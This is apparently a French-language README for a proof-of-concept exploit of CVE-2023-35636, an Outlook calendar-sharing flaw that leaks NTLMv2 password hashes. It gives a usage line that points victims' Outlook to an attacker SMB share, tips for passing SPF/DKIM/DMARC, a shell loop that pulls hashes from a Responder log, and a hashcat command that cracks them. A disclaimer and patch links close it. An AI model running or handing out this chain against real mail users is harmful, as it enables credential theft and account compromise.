
Microsoft Outlook Vulnérabilité de divulgation d'informations (fuite de hachage de mot de passe) - Expect Script POC
Vulnérabilité de divulgation d'informations de Microsoft Outlook (fuite de hachage de mot de passe) - Script Expect POC
CVE-2023-35636 est une exploitation de la fonction de partage de calendrier dans Microsoft Outlook, où l'ajout de deux en-têtes à un e-mail dirige Outlook pour partager du contenu et contacter une machine désignée, créant ainsi une opportunité d'intercepter un hachage NTLM v2.

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (n'oubliez pas tous les \)

notes: chmod +x cve-2023-35636.sh
nécessite l'application expect
nécessite un expéditeur IP et un expéditeur d'e-mail légitimes (pour passer SPF, DKIM, DMARC)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
Remerciements : https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
Solution de contournement/Correctif : https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
plus d'infos sur moi ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Avertissement : IMPORTANT : Ce script est fourni à des fins éducatives, de tests éthiques et d'utilisation légale UNIQUEMENT. Ne l'utilisez sur aucun système ou réseau sans autorisation explicite. L'accès non autorisé aux systèmes informatiques et aux réseaux est illégal, et les utilisateurs pris en train de mener des activités non autorisées sont passibles de poursuites judiciaires. L'auteur n'est PAS responsable des dommages causés par une mauvaise utilisation de ce script.